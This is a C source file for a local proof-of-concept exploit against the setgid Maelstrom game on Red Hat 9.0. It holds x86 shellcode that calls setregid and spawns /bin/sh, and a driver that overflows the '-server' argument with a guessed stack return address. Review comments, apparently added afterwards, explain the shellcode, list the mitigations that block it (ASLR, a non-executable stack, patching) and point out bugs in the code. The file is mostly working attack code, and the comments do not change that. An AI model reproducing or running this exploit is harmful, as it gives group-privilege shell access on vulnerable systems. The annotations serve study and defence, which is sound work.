/*  0x333maelstrom => Maelstrom local game exploit
 *
 *  proof-of-concept exploit tested against
 *  /usr/bin/Maelstrom under RH 9.0 
 *
 *  coded by c0wboy
 *
 *  (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAEL	"/usr/bin/Maelstrom"
#define SIZE	8177
#define ALIGN	3


/*
 * 38 bytes of 32-bit x86 Linux machine code, handed to the target as its only
 * environment string (see cya in main()).  It contains no NUL byte, so the
 * strlen() call in main() measures all of it.
 *
 * Decoded, it makes two int 0x80 system calls:
 *   1. eax=0x47 (setregid on i386) with ebx=ecx=0x14, i.e. setregid(20, 20)
 *   2. eax=0x0b (execve) on the string "/bin//sh" built on the stack
 *
 * For triage: the setregid() call only changes anything if the target runs
 * with group 20 available to it, i.e. a setgid binary.  Presumably gid 20 is
 * the games group on the tested system -- confirm against its /etc/group.
 * The exposure is that group's privileges, not root.  A setgid game binary
 * that ends up as an interactive /bin/sh is the runtime indicator to look for.
 */
unsigned char shellcode[] =

	"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
	"\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
	"\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b"
	"\xcd\x80";	



/*
 * Proof-of-concept driver: builds an over-long argument for the target's
 * "-server" option and execs the target with an environment that holds only
 * the machine code above.
 *
 * What the listing depends on, and therefore what blocks it:
 *   - an unchecked copy of the "-server" argument in the target (inferred
 *     from the over-long argument; the vulnerable code is not shown here),
 *     so the fix is a patched package or a bounds-checked copy;
 *   - a predictable stack top (the 0xbffffffa constant below), so stack
 *     address randomisation makes the address guess wrong;
 *   - an executable stack, so a non-executable stack stops the environment
 *     bytes from running;
 *   - a setgid bit on the target; without it the setregid() call gains nothing.
 * A multi-kilobyte argv to a game binary is also easy to spot in execve
 * audit logs.
 *
 * Takes no arguments.  Returns only if execle() fails, and then falls off the
 * end of main() without a return statement.
 */
int main()
{
	int i;
	/* Argument buffer passed after "-server". */
	char out[SIZE];
	/* Environment for the child: the machine code as the single entry. */
	/* NOTE(review): shellcode is unsigned char[], so this initializer and the strlen() call below mix pointer signedness. */
	char *cya[2] = { shellcode, NULL };

	/* int-sized cursor starting ALIGN bytes into out; these stores are not 4-byte aligned. */
	int *own = (int *)(out + ALIGN);

	/*
	 * Estimated address of the environment string in the child: a fixed
	 * near-top-of-stack constant minus the lengths of the environment string
	 * and of the program path.
	 * NOTE(review): this assumes the classic 32-bit Linux layout with the
	 * stack ending just below 0xc0000000 and no randomisation; it does not
	 * hold on a system with ASLR.
	 */
	int ret = 0xbffffffa - strlen(shellcode) - strlen(MAEL);

	/*
	 * Fill the buffer with copies of that address.
	 * NOTE(review): the loop makes 2044 stores (8176 bytes) starting at
	 * out + 3, so the last store runs 2 bytes past the end of out[8177], and
	 * nothing writes a terminating NUL before out is used as a C string.
	 * Both are undefined behaviour; the result depends on compiler and stack
	 * layout.
	 */
	for (i=0 ; i<SIZE-1 ; i+=4)
		*own++ = ret;

	/* Prefix "3@3" in the three bytes skipped by ALIGN. */
	/* NOTE(review): presumably the leading form the "-server" option parser expects; confirm against the target's source. */
	out[0] = '3';
	out[1] = '@';
	out[2] = '3';

	fprintf (stdout, "\n ** /usr/bin/Maelstrom local game exploit vr.0.2\n");
	fprintf (stdout, " ** by c0wboy / www.0x333.org\n\n");

	/*
	 * Replace this process with the target: argv = { MAEL, "-server", out },
	 * envp = cya.  The return value is not checked, so a missing binary
	 * fails silently.
	 * NOTE(review): the variadic terminator should be (char *)NULL.
	 */
	execle (MAEL, MAEL, "-server", out, NULL, cya);
}

